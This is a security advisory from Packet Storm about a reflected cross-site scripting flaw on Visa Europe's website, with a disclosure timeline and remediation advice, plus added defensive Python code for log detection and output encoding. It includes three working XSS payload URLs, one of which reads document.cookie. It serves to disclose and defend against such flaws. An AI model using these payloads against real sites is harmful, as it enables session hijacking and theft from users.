Visa Europe Cross Site Scripting

Published: 08 Feb 2014. Reported by Nicholas Lemonias. Source: packetstorm (packetstormsecurity.com).

Visa Europe Cross Site Scripting vulnerability on official website

Visa (Europe) Official Website Vulnerability
  
=============================================  
  
Published Report: 07/02/2014  
  
  
Credits: Advanced Information Security Corporation, USA  
  
  
Severity: High/Critical (OWASP TOP 10)  
CVSS: 7.0  
  
Type: Web Application / Reflected Cross-Site Scripting Attack.  
  
Author: Nicholas Lemonias.  
  
  
  
Background  
=============================================  
  
Visa Europe Ltd is a membership association and cooperative of over 3,700  
European banks and other payment service providers that operate Visa  
branded products and services within Europe. Visa Europe provides  
electronic payment services for cardholders, businesses, and retailers. The  
company offers debit, credit, virtual and prepaid credit-cards. The  
business has developed to provide consulting and analytics services for  
merchant agents and service providers. The business also offers payment  
security knowledge to business and government.  
  
The company is headquartered in London with satellite offices in Austria,  
Belgium, Bulgaria, Czech Republic, Finland, France, Germany, Greece,  
Hungary, Ireland, Israel, Italy, the Netherlands, Norway, Poland, Portugal,  
Romania, Spain, Sweden, Switzerland and Turkey.  
  
  
  
  
  
Coordinated Vulnerability Disclosure Timeline  
  
  
=============================================  
  
25th of November, 2013 - Contacted vendor regarding the security finding.
  
26th of November, 2013 - Vendor acknowledgement of the problem.  
  
2nd of December, 2013 - Problem verification.  
  
3rd of December, 2013 - Problem mitigation.  
  
  
  
Proof of Concept / Affected Services  
  
=============================================  
  
http://www.visaeurope.com/en/viewpoints.aspx?author=3%22%20onmouseover%3dprompt%28990207%29%20abc%3d%22&category=32&date=  
  
Affected directory: /en/viewpoints  
  
Injected Code to path fragment:  
/en/viewpoints.aspx?author=3%22%20onmouseover%3dprompt%28990207%29%20abc%3d%22&category=32&date="  
  
1. Escaping previous fragment function:  
2. Injection:  
onmouseover=onmouseover%3dprompt%2831337%29%20abc%3d%22&category=32&date="  
  
Description: When the user moves the mouse over the affected element, the
injected code is executed. In this proof of concept a prompt dialog interrupts
the user's normal execution flow.
  
  
Proof-Of-Concept 2  
  
=============================================  
http://www.visaeurope.com/en/viewpoints.aspx?author=3%22%20onmouseover%3dalert%28990207%29%20abc%3d%22&category=32&date=  
  
Proof-Of-Concept 3  
  
=============================================  
http://www.visaeurope.com/en/viewpoints.aspx?author=3%22%20onmouseover%3dalert%28document.cookie%29%20bxc%3d%22&category=32&date=  
  
* This vulnerability was reported to the relevant security teams which acted  
immediately to mitigate the issues.  
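The three PoC URLs above share one shape: a URL-encoded quote that closes the reflected attribute, followed by an `on<event>=` handler. The detector below, an added example that is not part of the advisory, URL-decodes each query parameter in access-log lines and flags values with that shape; the log lines are constructed for the example (combined log format, made-up IPs), and only the first two PoC query strings are taken from the advisory.

```python
"""Flag reflected-XSS probes of the attribute-breakout shape in web server
access logs.  Added example; not code from the advisory.  Log lines below are
constructed (combined log format, RFC 5737 documentation addresses)."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log: one benign request, the two PoC query strings from the
# advisory, and a benign request containing an encoded apostrophe.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Feb/2014:10:01:02 +0000] "GET /en/viewpoints.aspx?author=3&category=32&date= HTTP/1.1" 200 5123
203.0.113.11 - - [07/Feb/2014:10:01:05 +0000] "GET /en/viewpoints.aspx?author=3%22%20onmouseover%3dprompt%28990207%29%20abc%3d%22&category=32&date= HTTP/1.1" 200 5190
203.0.113.12 - - [07/Feb/2014:10:01:09 +0000] "GET /en/viewpoints.aspx?author=3%22%20onmouseover%3dalert%28document.cookie%29%20bxc%3d%22&category=32&date= HTTP/1.1" 200 5190
203.0.113.13 - - [07/Feb/2014:10:02:00 +0000] "GET /en/about.aspx?q=don%27t%20stop HTTP/1.1" 200 2048
"""

# Combined-log-format request line: client IP, timestamp, method, target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Attribute breakout: a quote character, optional whitespace, then an on<event>=
# handler.  Matched against the *decoded* parameter value, so %22 / %3d tricks
# in the raw URL do not evade it.
BREAKOUT_RE = re.compile(r'["\']\s*on[a-z]+\s*=', re.IGNORECASE)


def suspicious_params(target):
    """Return [(name, decoded_value)] for query parameters whose decoded value
    looks like an attribute breakout with an event handler."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl percent-decodes names and values (lowercase hex included).
    for name, value in parse_qsl(query, keep_blank_values=True):
        if BREAKOUT_RE.search(value):
            hits.append((name, value))
    return hits


def scan_log(text):
    """Return one finding per log line that carries a suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scan
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": urlsplit(m.group("target")).path,
                "status": int(m.group("status")),
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], f["params"])
```

Decoding before matching is the point: the same rule applied to the raw request line would have to enumerate every encoding of `"` and `=`. A 200 status on a flagged request is the case worth following up, since it means the page rendered rather than rejected the input.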
  
  
  
Recommendations provided for Quality of Service  
  
=============================================  
  
A. The recommendations made to Visa Europe Inc. were to consider encrypting
the view state of the application and, furthermore, to implement stronger
Cross-Site Scripting protection. XSS filtering was not properly applied, and
missing metacharacter filtering allowed input data to be altered and
third-party untrusted code to be executed.
  
Please note that malicious users could take advantage of this vulnerability, as
has been seen in malware and virus propagation incidents.
  
  
B. Our consultation to Visa Europe was therefore for an immediate risk
assessment and an immediate review of upper-level security policies in
accordance with ISO 27001 and ISO 27002 best practice, which the team kindly
followed, together with a full review of the ISMS policy scope and of the SDLC
of the vulnerable application and other subsidiary pages.
  
  
Appendices  
============================  
A. Suggested the filtering of metacharacters.
B. Suggested server-side encoding of < and > to &lt; and &gt; in application
output.
C. An XSS attack could enable mass attacks on users and products, phishing,
and theft of private and confidential information such as credit card
numbers, passwords, and stored accounts.
D. Filtering < and > and using appropriate encoding methods.
Citing an example, ( and ) should be filtered and encoded to &#40; and &#41;.

Example 2:
# and & converted to &#35; (#) and &#38; (&).
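Appendices B and D, and recommendation A, all come down to encoding the reflected value for the HTML attribute context it lands in. The following added example (not code from the advisory or from Visa Europe; the `render_link_*` functions are an assumed, simplified shape of the affected page) renders the advisory's first PoC `author` value two ways and uses Python's HTML parser to show which attributes the browser would actually see: the unencoded rendering yields an `onmouseover` attribute, while both `html.escape` and the numeric-entity mapping from Appendix D keep the whole value inside `href`.

```python
"""Attribute-context output encoding for a reflected query parameter.
Added example; the page template below is assumed, not the real site's code."""
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# The 'author' value from the advisory's first PoC URL, URL-decoded.
POC_AUTHOR = unquote("3%22%20onmouseover%3dprompt%28990207%29%20abc%3d%22")


def render_link_vulnerable(author):
    """Assumed shape of the flaw: the raw query value is concatenated into a
    quoted attribute, so a '"' in the value closes the attribute early."""
    return '<a href="/en/viewpoints.aspx?author=' + author + '">Viewpoints</a>'


def render_link_encoded(author):
    """Hardened version: HTML-encode the value, quotes included, before it is
    placed inside the attribute."""
    safe = html.escape(author, quote=True)
    return '<a href="/en/viewpoints.aspx?author=' + safe + '">Viewpoints</a>'


# Appendix D / Example 2 mapping, extended to the quote characters: each
# metacharacter becomes a numeric character reference.
META = {
    "<": "&#60;", ">": "&#62;", "(": "&#40;", ")": "&#41;",
    "#": "&#35;", "&": "&#38;", '"': "&#34;", "'": "&#39;",
}


def encode_metachars(s):
    """Single-pass numeric-entity encoding; one pass means '&' is never
    re-encoded after another character has been replaced."""
    return "".join(META.get(c, c) for c in s)


class AttrCollector(HTMLParser):
    """Collect the attribute names the parser sees on <a> tags."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.attrs.extend(name for name, _ in attrs)


def attribute_names(markup):
    """Attribute names of the <a> element(s) in markup, as a browser would parse them."""
    p = AttrCollector()
    p.feed(markup)
    p.close()
    return p.attrs


def has_event_handler(markup):
    """True if any parsed attribute is an on<event> handler."""
    return any(n.startswith("on") for n in attribute_names(markup))


if __name__ == "__main__":
    for label, fn in (("vulnerable", render_link_vulnerable),
                      ("html.escape", render_link_encoded)):
        out = fn(POC_AUTHOR)
        print(label, attribute_names(out), "handler:", has_event_handler(out))
    numeric = '<a href="/en/viewpoints.aspx?author=' + encode_metachars(POC_AUTHOR) + '">Viewpoints</a>'
    print("numeric entities", attribute_names(numeric), "handler:", has_event_handler(numeric))
```

The parser check is the useful part: it judges the rendered markup the way a browser does, rather than grepping for the payload string. `html.escape(..., quote=True)` is sufficient for a quoted attribute; the numeric-entity map is the advisory's own suggestion and additionally neutralises `(` and `)` for contexts where a handler body might be reflected.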
  
  
References  
============================  
[1] OWASP. 2013. Cross Site Scripting (XSS) attacks. [ONLINE] Available at:
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS), 2011.
[2] OWASP. 2013. XSS Filter Evasion Cheat-Sheet. [ONLINE] Available at:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet, 2013.
[3] Microsoft. 2011. Protecting against XSS attacks. [ONLINE] Available at:
http://msdn.microsoft.com/en-us/library/ff649310.aspx.
  
  
  
** This vulnerability report is posted for the wider benefit of the  
security community, as is and without any warranties, including the  
warranty of merchantability and capability fit for a particular purpose.  
The information is posted under the FOI as per best security practice.  
  
  
[Copyright Advanced Information Security Corp ©, 2014]
